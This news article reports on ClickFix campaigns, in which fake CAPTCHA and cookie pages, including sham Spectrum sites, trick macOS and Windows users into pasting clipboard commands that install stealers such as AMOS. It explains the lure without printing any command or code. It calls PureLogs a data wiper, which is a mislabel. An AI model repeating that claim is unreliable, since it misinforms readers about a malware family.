There are no viruses on macOS? Sure. Until you yourself copy them into your clipboard—at the hackers’ command.
The most dangerous thing is not the code itself, but the autopilot mode we slip into after hundreds of “I Agree” windows.
At first glance—it’s just a security check. But in reality, it’s a cleverly disguised trap leading straight into the hands of cybercriminals. Researchers from CloudSEK have documented a new wave of attacks targeting macOS users, using social engineering through fake CAPTCHA pages and malicious scripts. The infection method follows a scheme known as ClickFix—a technique that’s rapidly gaining popularity among spyware distributors.
This latest campaign revolves around the malicious program Atomic macOS Stealer (AMOS), which analysts have known about for a while. This time, it’s being spread through websites posing as pages of the American telecom operator Spectrum. Domain names like panel-spectrum[.]net and spectrum-ticket[.]net closely mimic legitimate addresses, increasing the plausibility of the fakes.
When visiting such a page, the victim is asked to complete a connection check using hCaptcha—allegedly to verify that traffic is not being intercepted. The user clicks the familiar “I’m not a robot” checkbox and then sees an error. The site claims the check failed and offers an “alternative verification” button that, when clicked, automatically copies a command to the clipboard.
What happens next depends on the operating system, but the goal is always the same: to convince the user to manually execute a malicious script. On macOS, the user is instructed to open the Terminal and paste a command that asks for the system password. Under this pretext, a chain of downloads is triggered: first a shell script, then a second-stage payload—AMOS.
AMOS is an information stealer designed to steal passwords, autofills, cryptocurrency wallet data, and other confidential information. The script actively uses macOS’s standard tools to bypass built-in protections, gain access to system data, and run binaries without warnings.
Analysis showed that the source code contains comments in Russian, indicating possible involvement of Russian-speaking hackers. This indirectly confirms the origin of the attack infrastructure and the methodology used.
Researchers also noted multiple errors in the logic of the malicious pages. For example, Linux users were shown a PowerShell command, which makes no sense for that platform. Additionally, both Windows and macOS users were told to press Win+R, which is meaningless on Apple computers. These inconsistencies suggest a rushed infrastructure setup—hackers likely wanted to launch the campaign before it was detected.
But even with such flaws, the ClickFix technique continues to work: it relies on users’ everyday habit of quickly clicking through checks and warnings. A fake CAPTCHA or cookie banner doesn’t raise alarms, especially if it looks pixel-perfect.
The ClickFix technique has already proven effective. In the past year alone, dozens of variations have been recorded. For example, in one incident in April 2025, attackers used this approach to deliver stealthy malicious files that, once in the system, facilitated lateral network movement, collected configuration data, and exfiltrated information via HTTP requests.
Delivery platforms vary, from email campaigns to compromised websites. In a campaign detected by Cofense, a fake Booking.com targeted the hospitality industry. The phishing emails contained links to CAPTCHA pages that hid scripts launching trojans like XWorm, DanaBot, and data wipers like PureLogs.
Sometimes, the malicious script is delivered not through a CAPTCHA but through fake cookie consent banners. Again, clicking the “Accept” button triggers a download, which the user then runs, thinking it’s a harmless setup step.
In other cases, well-known verification services like Google reCAPTCHA and Cloudflare Turnstile are faked. Attackers inject malicious code into these forms or embed them into already-compromised websites. Among the popular infection vectors were programs like Lumma Stealer, StealC, and full-fledged RAT tools like NetSupport.
CloudSEK and other companies found that ClickFix attacks are active in Europe, the U.S., the Middle East, and Africa. The geography is expanding, and the attack scenarios are becoming more diverse. But the goal remains the same.
The main vulnerability exploited by these campaigns is not in the software itself, but in human behavior. Users get used to endless verifications, checks, and consent windows—and at some point, they stop reading what exactly they’re approving.
The challenge in defending against this kind of scheme is that everything looks too familiar and believable. Antivirus software can’t always detect commands you run yourself. Firewalls won’t help either if the script uses built-in tools on macOS or Windows.
